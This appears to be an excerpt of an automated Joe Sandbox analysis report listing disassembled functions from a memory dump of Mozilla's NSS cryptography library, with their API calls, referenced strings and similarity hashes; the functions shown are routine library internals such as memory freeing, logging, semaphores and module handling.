PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6D555CF4
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6D555CFD
PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6D555D42
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6D555D4E
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D555D78
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6D555E18
TlsGetValue.KERNEL32 ref: 6D555E5E
EnterCriticalSection.KERNEL32(?), ref: 6D555E72
PR_Unlock.NSS3(?), ref: 6D555E8B

Part of subcall function 6D54F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6D54F854
Part of subcall function 6D54F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6D54F868
Part of subcall function 6D54F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6D54F882
Part of subcall function 6D54F820: free.MOZGLUE(04C483FF,?,?), ref: 6D54F889
Part of subcall function 6D54F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6D54F8A4
Part of subcall function 6D54F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6D54F8AB
Part of subcall function 6D54F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6D54F8C9
Part of subcall function 6D54F820: free.MOZGLUE(280F10EC,?,?), ref: 6D54F8D0

Strings

tokens=[0x%x=<%s>], xrefs: 6D555D3D
d, xrefs: 6D555C36

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
String ID: d$tokens=[0x%x=<%s>]
API String ID: 2028831712-1373489631
Opcode ID: 46264be79870a0eac869b721bf84cdfffed56d0afc013d6cd2ce2118df0706b4
Instruction ID: 7998eb6dcbbc1603f5e357c3a5d053f9ab438b52449d1b05cc72c8dd5512039f
Opcode Fuzzy Hash: 46264be79870a0eac869b721bf84cdfffed56d0afc013d6cd2ce2118df0706b4
Instruction Fuzzy Hash: 2071C8B19041029BEB0BDF65DC4173E3775BF85318F054876E90A9AA42EB32ED71C792

Function 6D548F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6D549582), ref: 6D548F5B

Part of subcall function 6D55BE30: SECOID_FindOID_Util.NSS3(6D51311B,00000000,?,6D51311B,?), ref: 6D55BE44

PORT_NewArena_Util.NSS3(00000800), ref: 6D548F6A

Part of subcall function 6D560FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6D5087ED,00000800,6D4FEF74,00000000), ref: 6D561000
Part of subcall function 6D560FF0: PR_NewLock.NSS3(?,00000800,6D4FEF74,00000000), ref: 6D561016
Part of subcall function 6D560FF0: PL_InitArenaPool.NSS3(00000000,security,6D5087ED,00000008,?,00000800,6D4FEF74,00000000), ref: 6D56102B

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6D548FC3
PK11_GetIVLength.NSS3(-00000001), ref: 6D548FE0
SEC_ASN1DecodeItem_Util.NSS3(?,?,6D62D820,6D549576), ref: 6D548FF9
DER_GetInteger_Util.NSS3(?), ref: 6D54901D
PORT_ZAlloc_Util.NSS3(?), ref: 6D54903E
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6D549062
memcpy.VCRUNTIME140(00000024,?,?), ref: 6D5490A2
PORT_ZAlloc_Util.NSS3(?), ref: 6D5490CA
memcpy.VCRUNTIME140(00000018,?,?), ref: 6D5490F0
PR_SetError.NSS3(FFFFE006,00000000), ref: 6D54912D
free.MOZGLUE(00000000), ref: 6D549136
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6D549145

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
String ID:
API String ID: 3626836424-0
Opcode ID: 984f52922efa818d153670bec8224ca62aa2ba79f88317e4e68f65de4cc88cca
Instruction ID: 07351417f62734a2f7cf09b90a8866289f70af064ba8e3a22db6e49c89b4ae49
Opcode Fuzzy Hash: 984f52922efa818d153670bec8224ca62aa2ba79f88317e4e68f65de4cc88cca
Instruction Fuzzy Hash: 8A51E3B1A082419BEB09CF28DC41B6BB7E4AF88314F05892DE959D7741E731E945CBD3

Function 6D614960 Relevance: 21.1, APIs: 14, Instructions: 121COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(00000004,?,6D618061,?,?,?,?), ref: 6D61497D
OpenSemaphoreA.KERNEL32(00100002,00000000,?), ref: 6D61499E
GetLastError.KERNEL32(?,?,6D618061,?,?,?,?), ref: 6D6149AC
PR_SetError.NSS3(FFFFE8C2,0000007B,?,?,6D618061,?,?,?,?), ref: 6D6149C2

Part of subcall function 6D5AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D5AC2BF

PR_SetError.NSS3(FFFFE890,00000000,?,?,6D618061,?,?,?,?), ref: 6D6149D6
CreateSemaphoreA.KERNEL32(00000000,6D618061,7FFFFFFF,?), ref: 6D614A19
GetLastError.KERNEL32(?,?,?,?,6D618061,?,?,?,?), ref: 6D614A30
PR_SetError.NSS3(FFFFE8C9,000000B7,?,?,?,?,6D618061,?,?,?,?), ref: 6D614A49
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,6D618061,?,?,?,?), ref: 6D614A52
GetLastError.KERNEL32(?,?,?,?,6D618061,?,?,?,?), ref: 6D614A5A
free.MOZGLUE(00000000,?,?,?,?,?,6D618061,?,?,?,?), ref: 6D614A6A
CreateSemaphoreA.KERNEL32(?,6D618061,7FFFFFFF,?), ref: 6D614A9A
free.MOZGLUE(?,?,?,?,?,6D618061,?,?,?,?), ref: 6D614AAE
free.MOZGLUE(?,?,?,?,?,6D618061,?,?,?,?), ref: 6D614AC2

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Error$LastSemaphorefree$Create$CloseHandleOpenValuemalloc
String ID:
API String ID: 2092618053-0
Opcode ID: 0f9901ffde82968adfe5e114f2633d64d40110cabec6895c97b82a8b1e61692f
Instruction ID: c9d46ad9fc14294b1010312e20f24dcff09b3bb76b75fcc301568409250679e2
Opcode Fuzzy Hash: 0f9901ffde82968adfe5e114f2633d64d40110cabec6895c97b82a8b1e61692f
Instruction Fuzzy Hash: 2641E574A082069BDF00DFB9DC49B9E7BB8BF8D359F050024F91AE7241DB71A814C762

Function 6D532DD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6D532DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6D532E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6D532E33

Part of subcall function 6D61D930: PL_strncpyz.NSS3(?,?,?), ref: 6D61D963

PR_LogPrint.NSS3(?,00000000), ref: 6D532E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6D532E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6D532E81

Strings

pPin = 0x%p, xrefs: 6D532E63
ulPinLen = %d, xrefs: 6D532E7C
(CK_INVALID_HANDLE), xrefs: 6D532E2C
hSession = 0x%x, xrefs: 6D532E0E, 6D532E1E
C_InitPIN, xrefs: 6D532DF1
nam, xrefs: 6D532E99, 6D532EC4

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN$nam
API String ID: 1003633598-1147897742
Opcode ID: aed20b8c0500038e9e5a8f5b8fe9ef0802e913dde4cdc6655cad8a8c91b4d722
Instruction ID: 47d1dbecd1d207fc2d85b2cfc7c04b85558886485cd08e5764ecb08332ff5ae8
Opcode Fuzzy Hash: aed20b8c0500038e9e5a8f5b8fe9ef0802e913dde4cdc6655cad8a8c91b4d722
Instruction Fuzzy Hash: A031F675508164ABDB24DF1ADC45F3A7775EB8A358F064424FA0CAB252EB349C44CBE3

Function 6D4FAF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6D4FAF47

Part of subcall function 6D5C9090: TlsGetValue.KERNEL32 ref: 6D5C90AB
Part of subcall function 6D5C9090: TlsGetValue.KERNEL32 ref: 6D5C90C9
Part of subcall function 6D5C9090: EnterCriticalSection.KERNEL32 ref: 6D5C90E5
Part of subcall function 6D5C9090: TlsGetValue.KERNEL32 ref: 6D5C9116
Part of subcall function 6D5C9090: LeaveCriticalSection.KERNEL32 ref: 6D5C913F

FreeLibrary.KERNEL32(?), ref: 6D4FAF6D
free.MOZGLUE(?), ref: 6D4FAFA4
free.MOZGLUE(?), ref: 6D4FAFAA
PR_ExitMonitor.NSS3 ref: 6D4FAFB5
PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6D4FAFF5
PR_ExitMonitor.NSS3 ref: 6D4FB005
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6D4FB014
PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6D4FB028
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6D4FB03C

Strings

%s decr => %d, xrefs: 6D4FAFF0
Unloaded library %s, xrefs: 6D4FB023

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
String ID: %s decr => %d$Unloaded library %s
API String ID: 4015679603-2877805755
Opcode ID: 4109d7689e5ee909289f44eaa2a73a1ed5b69b6adabcdafbd4e5722b30d3c99b
Instruction ID: dd445856b0d529c7d543279c074dec3c20c36464b07834088e82ab1be339911f
Opcode Fuzzy Hash: 4109d7689e5ee909289f44eaa2a73a1ed5b69b6adabcdafbd4e5722b30d3c99b
Instruction Fuzzy Hash: 013108B4A08211ABDB01DF65DC41F25B774EF85318B154125E9058B211F322EC26C7E3

Function 6D546C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6D54781D,00000000,6D53BE2C,?,6D546B1D,?,?,?,?,00000000,00000000,6D54781D), ref: 6D546C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6D54781D,?,6D53BE2C,?), ref: 6D546C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6D54781D), ref: 6D546C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6D546C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6D546C96

Part of subcall function 6D4F1240: TlsGetValue.KERNEL32(00000040,?,6D4F116C,NSPR_LOG_MODULES), ref: 6D4F1267
Part of subcall function 6D4F1240: EnterCriticalSection.KERNEL32(?,?,?,6D4F116C,NSPR_LOG_MODULES), ref: 6D4F127C
Part of subcall function 6D4F1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6D4F116C,NSPR_LOG_MODULES), ref: 6D4F1291
Part of subcall function 6D4F1240: PR_Unlock.NSS3(?,?,?,?,6D4F116C,NSPR_LOG_MODULES), ref: 6D4F12A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6D546CAA

Strings

sql:, xrefs: 6D546C52
NSS_DEFAULT_DB_TYPE, xrefs: 6D546C91
rdb:, xrefs: 6D546C69
extern:, xrefs: 6D546C7E
dbm:, xrefs: 6D546C3A
dbm, xrefs: 6D546CA4

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: b8f4d03c82eb7b358e8dd60a482a6e5509cd8fef14db089e02929eecc31a1ad2
Instruction ID: 34f1f116ff8369d96723e0884b31430d09834df5b9d85c2a8002b67a012233ce
Opcode Fuzzy Hash: b8f4d03c82eb7b358e8dd60a482a6e5509cd8fef14db089e02929eecc31a1ad2
Instruction Fuzzy Hash: FE01A2F1B013126BF710277A6E4EF76364D9F45658F05C432FE09E2182EBD2E56480E6

Function 6D554E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6D5178F8), ref: 6D554E6D

Part of subcall function 6D4F09E0: TlsGetValue.KERNEL32(00000000,?,?,?,6D4F06A2,00000000,?), ref: 6D4F09F8
Part of subcall function 6D4F09E0: malloc.MOZGLUE(0000001F), ref: 6D4F0A18
Part of subcall function 6D4F09E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6D4F0A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6D5178F8), ref: 6D554ED9

Part of subcall function 6D545920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6D547703,?,00000000,00000000), ref: 6D545942
Part of subcall function 6D545920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6D547703), ref: 6D545954
Part of subcall function 6D545920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6D54596A
Part of subcall function 6D545920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6D545984
Part of subcall function 6D545920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6D545999
Part of subcall function 6D545920: free.MOZGLUE(00000000), ref: 6D5459BA
Part of subcall function 6D545920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6D5459D3
Part of subcall function 6D545920: free.MOZGLUE(00000000), ref: 6D5459F5
Part of subcall function 6D545920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6D545A0A
Part of subcall function 6D545920: free.MOZGLUE(00000000), ref: 6D545A2E
Part of subcall function 6D545920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6D545A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6D5178F8), ref: 6D554EB3

Part of subcall function 6D554820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6D554EB8,?,?,?,?,?,?,?,?,?,?,6D5178F8), ref: 6D55484C
Part of subcall function 6D554820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6D554EB8,?,?,?,?,?,?,?,?,?,?,6D5178F8), ref: 6D55486D
Part of subcall function 6D554820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6D554EB8,?), ref: 6D554884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6D5178F8), ref: 6D554EC0

Part of subcall function 6D554470: TlsGetValue.KERNEL32(00000000,?,6D517296,00000000), ref: 6D554487
Part of subcall function 6D554470: EnterCriticalSection.KERNEL32(?,?,?,6D517296,00000000), ref: 6D5544A0
Part of subcall function 6D554470: PR_Unlock.NSS3(?,?,?,?,6D517296,00000000), ref: 6D5544BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6D5178F8), ref: 6D554F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6D5178F8), ref: 6D554F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6D5178F8), ref: 6D554F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6D5178F8), ref: 6D554F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D5178F8), ref: 6D554F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6D5178F8), ref: 6D554F8F
PK11_UpdateSlotAttribute.NSS3(?,6D62DCB0,00000000), ref: 6D554FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6D55501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6D5178F8), ref: 6D55506B

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: d226999df953b03bccaa5a146f5c73090d5209b88c99706ec830a720283f5457
Instruction ID: 63d15b84fa1630619a01f35c4147f372a85574de5b0bb8cfa43ad9bc3559d84f
Opcode Fuzzy Hash: d226999df953b03bccaa5a146f5c73090d5209b88c99706ec830a720283f5457
Instruction Fuzzy Hash: B05116B5C042029BDB169F25EC01A7B37B4FF49359F054A36ED0A86A11FB31D931CAD2

Function 6D4FACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D4FACE2
malloc.MOZGLUE(00000001), ref: 6D4FACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6D4FAD02
TlsGetValue.KERNEL32 ref: 6D4FAD3C
calloc.MOZGLUE(00000001,?), ref: 6D4FAD8C
PR_Unlock.NSS3 ref: 6D4FADC0
free.MOZGLUE(00000000), ref: 6D4FAE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6D4FAE58
free.MOZGLUE(00000000), ref: 6D4FAE69
free.MOZGLUE(?), ref: 6D4FAE78
PR_Unlock.NSS3 ref: 6D4FAE8C
free.MOZGLUE(?), ref: 6D4FAEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6D4FAEC7

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: aa4d885219634b8a0ea976d5a5c2a8d8294a7953b4da3a3f4167446d0d6061a9
Instruction ID: c93b23948934322c93e37da15142867dce3d1bf2344e246859b6f1907dc84473
Opcode Fuzzy Hash: aa4d885219634b8a0ea976d5a5c2a8d8294a7953b4da3a3f4167446d0d6061a9
Instruction Fuzzy Hash: EB519AB49802568BEB01DF69DC42F6E77B5BF8A304F154025DA09E3320E335AD46CBE2

Function 6D5D4C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6D5D4CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6D5D4CFD
sqlite3_value_text16.NSS3(?), ref: 6D5D4D44

Strings

no more rows available, xrefs: 6D5D4D2E
bad parameter or other API misuse, xrefs: 6D5D4D05
API call with %s database connection pointer, xrefs: 6D5D4CF6
out of memory, xrefs: 6D5D4C78, 6D5D4C9E
another row available, xrefs: 6D5D4D20
abort due to ROLLBACK, xrefs: 6D5D4D27, 6D5D4D33
invalid, xrefs: 6D5D4CF1
unknown error, xrefs: 6D5D4D56

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: 89b016cf79566da9d836af733dd19704f4325ae01813903dfd0317f327dac887
Instruction ID: e7848bcf92f860a2ea1924d9b1645f673fc37a38d944f92ee9d17fea7dc59bfd
Opcode Fuzzy Hash: 89b016cf79566da9d836af733dd19704f4325ae01813903dfd0317f327dac887
Instruction Fuzzy Hash: 82317AB1E1C962ABDB4D9B2C98047B57321778F310F024D39D4244BA79C721AC6187FB

Function 6D532CD0 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6D532CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6D532D07

Part of subcall function 6D6109D0: PR_Now.NSS3 ref: 6D610A22
Part of subcall function 6D6109D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6D610A35
Part of subcall function 6D6109D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6D610A66
Part of subcall function 6D6109D0: PR_GetCurrentThread.NSS3 ref: 6D610A70
Part of subcall function 6D6109D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6D610A9D
Part of subcall function 6D6109D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6D610AC8
Part of subcall function 6D6109D0: PR_vsmprintf.NSS3(?,?), ref: 6D610AE8
Part of subcall function 6D6109D0: EnterCriticalSection.KERNEL32(?), ref: 6D610B19
Part of subcall function 6D6109D0: OutputDebugStringA.KERNEL32(00000000), ref: 6D610B48
Part of subcall function 6D6109D0: _PR_MD_UNLOCK.NSS3(?), ref: 6D610C76
Part of subcall function 6D6109D0: PR_LogFlush.NSS3 ref: 6D610C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6D532D22

Part of subcall function 6D6109D0: OutputDebugStringA.KERNEL32(?), ref: 6D610B88
Part of subcall function 6D6109D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6D610C5D
Part of subcall function 6D6109D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6D610C8D
Part of subcall function 6D6109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D610C9C
Part of subcall function 6D6109D0: OutputDebugStringA.KERNEL32(?), ref: 6D610CD1
